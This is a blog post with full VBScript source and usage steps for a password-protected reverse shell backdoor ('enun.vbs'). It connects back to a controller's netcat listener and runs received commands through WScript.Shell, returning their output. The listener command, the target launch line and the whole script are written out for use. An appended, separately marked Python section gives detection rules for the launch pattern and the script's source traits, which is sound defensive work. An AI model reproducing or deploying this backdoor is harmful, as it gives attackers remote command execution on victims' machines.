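Building your own remote CMD shell in VBScript, with usage instructions
Usage:
1. Controller: nc.exe, run: nc -l -v -p 1234;

2. Target: cscript.exe enun.vbs IP Port;

3. Password: enun.
Notes:
1. To leave the shell, type "exit"; do not use "Ctrl + C", otherwise you can only reconnect after the target reboots or the backdoor is run again manually;
2. On Windows 7 and similar environments an ordinary standard user can also use it, but the privileges obtained are relatively limited.
3. Built-in commands and pipes are used as shown in the figure below:

Related downloads:
1. Video demonstration
2. vb6controls
enun.vbs source: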
'--------------------------------------------------------------------------
' Copyright (c) lxzzr. All rights reserved.
' ScriptName: enun.vbs
' Creation Date: 28/8/2012
' Last Modified: 28/8/2012
' Author: lxzzr, www.enun.net
' E-mail: lxzzr@21cn.com
' Usage: Cscript.exe //nologo enun.vbs IP Port
'--------------------------------------------------------------------------
On Error Resume Next
Public SocketObj, ExecObj, ShellObj
RemoteHost = Wscript.Arguments(0)
RemotePort = Wscript.Arguments(1)
Do
Do While (SocketObj.State <> 7)
WScript.Echo "Try Connect to " & RemoteHost & ":" & RemotePort & " ..."
Set SocketObj = WScript.CreateObject("MSWinsock.Winsock")
SocketObj.Protocol = 0
SocketObj.RemoteHost = RemoteHost
SocketObj.RemotePort = RemotePort
SocketObj.Connect
WScript.Sleep 3000
Loop
WScript.Echo "Connected to server."
SocketObj.SendData SocketObj.LocalHostName & " is Connected, Enter Password: "
Do While (SocketObj.BytesReceived = 0)
WScript.Sleep 10
Loop
' Password verification
SocketObj.GetData Authkey, vbString
If Split(Authkey, chr(10), -1, 1)(0) = "enun" Then
Set ShellObj = CreateObject("WScript.Shell")
sRevData = " "
SocketObj.SendData "Logon Success, Welcome!" & chr(13) & chr(10)
' Loop, waiting for commands to execute
Do
Set ExecObj = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))
SocketObj.SendData ExecObj.StdOut.ReadAll
SocketObj.SendData ExecObj.StdErr.ReadAll
If sRevData <> "" Then
SocketObj.SendData chr(10) & "[" & SocketObj.LocalHostName & "@" & "enun]#: "
End If
If Left(sRevData, 4) = "exit" Then
SocketObj.Close
Exit Do
End If
SocketObj.GetData sRevData, vbString
WScript.Sleep 1000
Loop
Else
LockoutBadCount = LockoutBadCount + 1
SocketObj.SendData "Logon Failure: Unknown user name or bad password." & chr(13) & chr(10)
WScript.Sleep 1000
End If
' Account lockout policy
If (LockoutBadCount > 3) Then
SocketObj.SendData "The User Account is locked!" & chr(13) & chr(10)
WScript.Sleep 1000
SocketObj.Close
LockoutBadCount = 0
WScript.Sleep 600*1000
End If
Loop
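Added detection example (not part of the original post or its author's code): the Python below flags the two things this page exposes to a defender, the "cscript.exe <script>.vbs IP Port" launch pattern from the usage section and the source traits of the listing (MSWinsock.Winsock control, WScript.Shell Exec, command output sent back over the socket). The function names, the sample command lines and the sample source fragment are constructed for illustration.

```python
import ipaddress
import re

SCRIPT_HOSTS = {"cscript", "cscript.exe", "wscript", "wscript.exe"}
# Source-level traits of the listing above: a Winsock COM control, WScript.Shell
# with Exec, and command output written straight back to the socket.
SOURCE_TRAITS = {
    "winsock_control": re.compile(r'CreateObject\(\s*"MSWinsock\.Winsock', re.I),
    "wscript_shell": re.compile(r'CreateObject\(\s*"WScript\.Shell"', re.I),
    "exec_call": re.compile(r"\.Exec\s*\(", re.I),
    "output_to_socket": re.compile(r"\.SendData\s+\w+\.Std(?:Out|Err)\.ReadAll", re.I),
}

def source_traits(text):
    """Names of the traits found in a script's source text."""
    return sorted(name for name, rx in SOURCE_TRAITS.items() if rx.search(text))

def script_host_callback(cmdline):
    """Return (script, ip, port) when a script host runs a .vbs with 'IP Port' arguments."""
    tokens = [t.strip('"') for t in cmdline.split()]  # assumption: no spaces in paths
    if not tokens or tokens[0].replace("\\", "/").rsplit("/", 1)[-1].lower() not in SCRIPT_HOSTS:
        return None
    args = [t for t in tokens[1:] if not t.startswith("//")]  # drop switches such as //nologo
    for script, host, port in zip(args, args[1:], args[2:]):
        if not script.lower().endswith((".vbs", ".vbe")):
            continue
        try:
            ipaddress.ip_address(host)  # only literal IP addresses count here
        except ValueError:
            continue
        if port.isdecimal() and 0 < int(port) < 65536:
            return script, host, int(port)
    return None

# Constructed process-creation command lines (192.0.2.0/24 is a documentation range).
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\cscript.exe //nologo enun.vbs 192.0.2.10 1234",
    r"cscript.exe //nologo C:\Scripts\inventory.vbs /quiet",
    r"wscript.exe report.vbs 2012 08",
]
# Constructed source fragment using the same calls as the listing.
SAMPLE_SOURCE = '''Set s = WScript.CreateObject("MSWinsock.Winsock")
Set sh = CreateObject("WScript.Shell")
Set e = sh.Exec(cmd)
s.SendData e.StdOut.ReadAll
'''

if __name__ == "__main__":
    print([script_host_callback(c) for c in SAMPLE_CMDLINES], source_traits(SAMPLE_SOURCE))
```

The command-line check only matches literal IP addresses; a host name passed as the first argument needs a separate rule, and all four source traits together are a much stronger signal than any single one.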